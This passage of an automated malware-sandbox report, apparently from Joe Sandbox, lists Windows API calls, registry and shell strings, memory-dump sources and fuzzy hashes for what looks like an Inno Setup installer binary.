                                                                                    • Part of subcall function 00483F60: GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 00483FDA
                                                                                    • Part of subcall function 0048428C: GetVersionExA.KERNEL32(?,0048449E,00000000,00484573,?,?,?,?,?,00499301), ref: 0048429A
                                                                                    • Part of subcall function 0048428C: GetVersionExA.KERNEL32(0000009C,?,0048449E,00000000,00484573,?,?,?,?,?,00499301), ref: 004842EC
                                                                                    • Part of subcall function 0042E3A4: SetErrorMode.KERNEL32(00008000), ref: 0042E3AE
                                                                                    • Part of subcall function 0042E3A4: LoadLibraryA.KERNEL32(00000000,00000000,0042E3F8,?,00000000,0042E416,?,00008000), ref: 0042E3DD
                                                                                  • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 0048455B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$HandleModuleVersion$CurrentErrorInfoLibraryLoadModeNativeProcessSystem
                                                                                  • String ID: SHGetKnownFolderPath$shell32.dll
                                                                                  • API String ID: 3869789854-2936008475
                                                                                  • Opcode ID: 9e6442ad45a9baf58573cca34446e5dc04ecce57dab5d62ccafdb81a0b60815b
                                                                                  • Instruction ID: 72a1cd0c007ae7d2331b3d049f57d6a032e0567b1decddf8ad8e9e8191a8a5bf
                                                                                  • Opcode Fuzzy Hash: 9e6442ad45a9baf58573cca34446e5dc04ecce57dab5d62ccafdb81a0b60815b
                                                                                  • Instruction Fuzzy Hash: D821EFB0A243416AC700BFBE596614A3BA5EB9471C390493BF800EB3D1D67E6414AB6E
                                                                                  APIs
                                                                                  • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,0047CDB0,00000000,0047CDC6), ref: 0047CABE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Close
                                                                                  • String ID: RegisteredOrganization$RegisteredOwner
                                                                                  • API String ID: 3535843008-1113070880
                                                                                  • Opcode ID: c1b6d14e45d78727ed45f55f4f17675dd1bb73358709ca4c1a4910a815b4512c
                                                                                  • Instruction ID: 80e31e652a078fa29572911d568a821ff54af8e3d41ae7cfbc3eead46bc77173
                                                                                  • Opcode Fuzzy Hash: c1b6d14e45d78727ed45f55f4f17675dd1bb73358709ca4c1a4910a815b4512c
                                                                                  • Instruction Fuzzy Hash: 99F09021B04108ABD710D664EC82B9B33A9D741308F24847FA1049B351D679AE00975C
                                                                                  APIs
                                                                                  • RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,JfG,?,0049D1E0,?,0046F353,?,00000000,0046F8EE,?,_is1), ref: 0046F05F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Value
                                                                                  • String ID: Inno Setup: Setup Version$JfG
                                                                                  • API String ID: 3702945584-2837433363
                                                                                  • Opcode ID: ba37289afc6bf64f1b4e35152e82186c6909c63cd97613f7ebaef7afec976743
                                                                                  • Instruction ID: 9307b71ef0b0d9a21e7f4f46c2dc1735a92df317579ad27da25cacea1a1ff421
                                                                                  • Opcode Fuzzy Hash: ba37289afc6bf64f1b4e35152e82186c6909c63cd97613f7ebaef7afec976743
                                                                                  • Instruction Fuzzy Hash: 0AE06D713016047FD710AA6B9C85F5BABDCDF88365F00403AB908DB392D578DD0042A8
                                                                                  APIs
                                                                                  • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,004758BF), ref: 004756AD
                                                                                  • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,004758BF), ref: 004756C4
                                                                                    • Part of subcall function 00453510: GetLastError.KERNEL32(00000000,004540A5,00000005,00000000,004540DA,?,?,00000000,0049C628,00000004,00000000,00000000,00000000,?,00498A7D,00000000), ref: 00453513
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseCreateErrorFileHandleLast
                                                                                  • String ID: CreateFile
                                                                                  • API String ID: 2528220319-823142352
                                                                                  • Opcode ID: 79eec7588c7af6c2029a89254d08153dd0e3e04ff33533a08b7dcbd789b2e8ab
                                                                                  • Instruction ID: 806dc226f5a2fe5ebbb1f055bcab6d135f745baec99644e0dc49489f7e0d9994
                                                                                  • Opcode Fuzzy Hash: 79eec7588c7af6c2029a89254d08153dd0e3e04ff33533a08b7dcbd789b2e8ab
                                                                                  • Instruction Fuzzy Hash: E4E06D303403447BEA10EA79DCC6F4A77989B04778F108151FA48AF3E2C5B9FC408A58
                                                                                  APIs
                                                                                    • Part of subcall function 004570EC: CoInitialize.OLE32(00000000), ref: 004570F2
                                                                                    • Part of subcall function 0042E3A4: SetErrorMode.KERNEL32(00008000), ref: 0042E3AE
                                                                                    • Part of subcall function 0042E3A4: LoadLibraryA.KERNEL32(00000000,00000000,0042E3F8,?,00000000,0042E416,?,00008000), ref: 0042E3DD
                                                                                  • GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 00457180
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressErrorInitializeLibraryLoadModeProc
                                                                                  • String ID: SHCreateItemFromParsingName$shell32.dll
                                                                                  • API String ID: 2906209438-2320870614
                                                                                  • Opcode ID: 117bb836f2798fba922b12c43cef4fcbc71072008b94f68fc3b4bb9dbbbeaa5f
                                                                                  • Instruction ID: 9c527047bf7e84dae422e031a0d6d6e9bbae4a3d03e504f065b317ec79f67602
                                                                                  • Opcode Fuzzy Hash: 117bb836f2798fba922b12c43cef4fcbc71072008b94f68fc3b4bb9dbbbeaa5f
                                                                                  • Instruction Fuzzy Hash: 6AC04CA0B4591066C70077B6AC0361F24459B4072FB14C07BBD44A7787CE3D884D6A6E
                                                                                  APIs
                                                                                    • Part of subcall function 0042E3A4: SetErrorMode.KERNEL32(00008000), ref: 0042E3AE
                                                                                    • Part of subcall function 0042E3A4: LoadLibraryA.KERNEL32(00000000,00000000,0042E3F8,?,00000000,0042E416,?,00008000), ref: 0042E3DD
                                                                                  • GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046CF05
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressErrorLibraryLoadModeProc
                                                                                  • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                                  • API String ID: 2492108670-2683653824
                                                                                  • Opcode ID: 8a5a2bfda678a4119f98cbe0ea23aba1ca22618b19e5ef326a03b239f4c9458f
                                                                                  • Instruction ID: 33f7e53ae4e5ba8297804bd6606edee94f75655c5a8d17986cd3cb8a189a0b51
                                                                                  • Opcode Fuzzy Hash: 8a5a2bfda678a4119f98cbe0ea23aba1ca22618b19e5ef326a03b239f4c9458f
                                                                                  • Instruction Fuzzy Hash: CDB092B0A146405ACB446772988262B20069B4071DF60843BB4C4AB6D9EABC88492B9F
                                                                                  APIs
                                                                                  • LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,00000000,0044877D), ref: 004486C0
                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00448741
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressLibraryLoadProc
                                                                                  • String ID:
                                                                                  • API String ID: 2574300362-0
                                                                                  • Opcode ID: 9192854c716958fcf12a54fd54f15ae173329ead0ce31acd6b56a672af8f6247
                                                                                  • Instruction ID: 67510ac2dd358758032eb9bd0b15bc7699fd1d5ac1297ef1938a655c08aa7b0d
                                                                                  • Opcode Fuzzy Hash: 9192854c716958fcf12a54fd54f15ae173329ead0ce31acd6b56a672af8f6247
                                                                                  • Instruction Fuzzy Hash: 89515574E00109AFDB10EF95C891A9EB7F9EB44315F20817FE814BB391CA789E05CB99
                                                                                  APIs
                                                                                  • GetSystemMenu.USER32(00000000,00000000,00000000,00482298), ref: 00482230
                                                                                  • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 00482241
                                                                                  • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00482259
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Menu$Append$System
                                                                                  • String ID:
                                                                                  • API String ID: 1489644407-0
                                                                                  • Opcode ID: b0f6966b6a184f1facb0a871f26b18c64fa7cdea68dfa8979e13f5b501864372
                                                                                  • Instruction ID: a26f55f7f9cdec50315d50fbbd1418f41be5c601f9b239732c1f252fb764c371
                                                                                  • Opcode Fuzzy Hash: b0f6966b6a184f1facb0a871f26b18c64fa7cdea68dfa8979e13f5b501864372
                                                                                  • Instruction Fuzzy Hash: FE31CD707043451BD721BB368D86B9E3B949B5A318F50197FF900AA3E3CABC9D09839D
                                                                                  APIs
                                                                                  • GetDC.USER32(00000000), ref: 0044B475
                                                                                  • SelectObject.GDI32(?,00000000), ref: 0044B498
                                                                                  • ReleaseDC.USER32(00000000,?), ref: 0044B4CB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ObjectReleaseSelect
                                                                                  • String ID:
                                                                                  • API String ID: 1831053106-0
                                                                                  • Opcode ID: a18c564e5665bffaeec971d30f69da7c159b46b6830c6159626304e36c153c38
                                                                                  • Instruction ID: 7b4e641b5f80a70363e1f29cb6207b12473e64a09d761e596b30cfa5093ee172
                                                                                  • Opcode Fuzzy Hash: a18c564e5665bffaeec971d30f69da7c159b46b6830c6159626304e36c153c38
                                                                                  • Instruction Fuzzy Hash: FE217970E04344BFEB11DFA5C841B9EBBB8DB49304F51807AF900A6292D77CD940CB59
                                                                                  APIs
                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0044B1C0,?,00482AC7,?,?), ref: 0044B192
                                                                                  • DrawTextW.USER32(?,?,00000000,?,?), ref: 0044B1A5
                                                                                  • DrawTextA.USER32(?,00000000,00000000,?,?), ref: 0044B1D9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: DrawText$ByteCharMultiWide
                                                                                  • String ID:
                                                                                  • API String ID: 65125430-0
                                                                                  • Opcode ID: 9eed18fe0356815f810c820b6721896f6c4265f9db16303b213c34b2c03d3f04
                                                                                  • Instruction ID: 63060d4c4a21d3a06b37f0b793f587d40fe85ad593019d515c43c5dd919fcfdf
                                                                                  • Opcode Fuzzy Hash: 9eed18fe0356815f810c820b6721896f6c4265f9db16303b213c34b2c03d3f04
                                                                                  • Instruction Fuzzy Hash: 3111CBB27046047FEB11DB6A9C82D6F77ECDB49750F10417BF504D72D0D6389E018669
                                                                                  APIs
                                                                                  • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00424422
                                                                                  • TranslateMessage.USER32(?), ref: 0042449F
                                                                                  • DispatchMessageA.USER32(?), ref: 004244A9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Message$DispatchPeekTranslate
                                                                                  • String ID:
                                                                                  • API String ID: 4217535847-0
                                                                                  • Opcode ID: d4f7142ddfb2041a0388c754ad29f8297397d1c5d5a6fc901d04af05902ad934
                                                                                  • Instruction ID: 24a07c1e81c585bad35552c3917a3e7b04f02dd2aaee7f9545dc892aa94dfb52
                                                                                  • Opcode Fuzzy Hash: d4f7142ddfb2041a0388c754ad29f8297397d1c5d5a6fc901d04af05902ad934
                                                                                  • Instruction Fuzzy Hash: AE119E307043205AEE20FA64AD41B9B73D4DFE1708F80881EF8D997382D77D9E49879A
                                                                                  APIs
                                                                                  • SetPropA.USER32(00000000,00000000), ref: 0041667A
                                                                                  • SetPropA.USER32(00000000,00000000), ref: 0041668F
                                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,00000000,00000000,?,00000000,00000000), ref: 004166B6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Prop$Window
                                                                                  • String ID:
                                                                                  • API String ID: 3363284559-0
                                                                                  • Opcode ID: 9ba9d7b7418b74f48756624976096bebc6fb66c7a646a8b19f5d3d1e069ceb03
                                                                                  • Instruction ID: 86f537f0b59e140ef7690159b30d1f2105a0adb91ae91f828a802e84d443a7b9
                                                                                  • Opcode Fuzzy Hash: 9ba9d7b7418b74f48756624976096bebc6fb66c7a646a8b19f5d3d1e069ceb03
                                                                                  • Instruction Fuzzy Hash: 4AF0BD72741220ABE710AB598C85FA632ECAB0D715F16017ABA05EF286C679DC4087A8
                                                                                  APIs
                                                                                  • IsWindowVisible.USER32(?), ref: 0041EE74
                                                                                  • IsWindowEnabled.USER32(?), ref: 0041EE7E
                                                                                  • EnableWindow.USER32(?,00000000), ref: 0041EEA4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$EnableEnabledVisible
                                                                                  • String ID:
                                                                                  • API String ID: 3234591441-0
                                                                                  • Opcode ID: 908e1640c45beef437f125b63470cd7f97cb81b788dbbb5d15c196427eefded0
                                                                                  • Instruction ID: 2c5c4f0331a1d41ebe9848165d0c8b98450d8d3461f9c723900bbadb0b89b381
                                                                                  • Opcode Fuzzy Hash: 908e1640c45beef437f125b63470cd7f97cb81b788dbbb5d15c196427eefded0
                                                                                  • Instruction Fuzzy Hash: 2DE0E5B81003006EE310AB2BEC81A57779CAB55354F55843BAC0997292D63ED8509ABD
                                                                                  APIs
                                                                                  • SetActiveWindow.USER32(?), ref: 0046A0F1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ActiveWindow
                                                                                  • String ID: PrepareToInstall
                                                                                  • API String ID: 2558294473-1101760603
                                                                                  • Opcode ID: b7687f3bb43c73226d704110cc29f9815bff5a15c1e12b08bb6fc701f5c431d6
                                                                                  • Instruction ID: 8b7f344ad1fa3e917ae8cfb2dbd3f87d9064e965c7569195748e39604a53e5b8
                                                                                  • Opcode Fuzzy Hash: b7687f3bb43c73226d704110cc29f9815bff5a15c1e12b08bb6fc701f5c431d6
                                                                                  • Instruction Fuzzy Hash: D2A11934A00109DFCB00EF99D986EDEB7F5AF49304F5540B6E804AB366D738AE45CB5A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: /:*?"<>|
                                                                                  • API String ID: 0-4078764451
                                                                                  • Opcode ID: 06161939b9b6972920a3f4778fa34d5926bec049205355badb073ad507413406
                                                                                  • Instruction ID: 6f1ddb1d4c6bf41fe4e6ef022f3ca721468d6fb529cb74a3921b09cafe59df1d
                                                                                  • Opcode Fuzzy Hash: 06161939b9b6972920a3f4778fa34d5926bec049205355badb073ad507413406
                                                                                  • Instruction Fuzzy Hash: BB719270A44205ABEB20F765DCC2BEE77A19B41348F10C077F580BB292E779AD49875E
                                                                                  APIs
                                                                                  • SetActiveWindow.USER32(?), ref: 00482B5A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ActiveWindow
                                                                                  • String ID: InitializeWizard
                                                                                  • API String ID: 2558294473-2356795471
                                                                                  • Opcode ID: 9aeb3d77867af7e6d972f6b1feb637164b3d788d95ca79b69b372c6f9b450635
                                                                                  • Instruction ID: db7d1b329271c039a587c966101a95f378ab38c3ed45019f3272f41b6ba32bbe
                                                                                  • Opcode Fuzzy Hash: 9aeb3d77867af7e6d972f6b1feb637164b3d788d95ca79b69b372c6f9b450635
                                                                                  • Instruction Fuzzy Hash: 6D115E31A09200AFD715FF29ED86B1A7BE4E759328F60443BE404872A1DA79AC46DB1D
                                                                                  APIs
                                                                                    • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004840C7,?,00000001,?,?,004840C7,?,00000001,00000000), ref: 0042DE48
                                                                                  • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,?,?,0047CBC4,00000000,0047CDC6), ref: 0047C9BD
                                                                                  Strings
                                                                                  • Software\Microsoft\Windows\CurrentVersion, xrefs: 0047C98D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
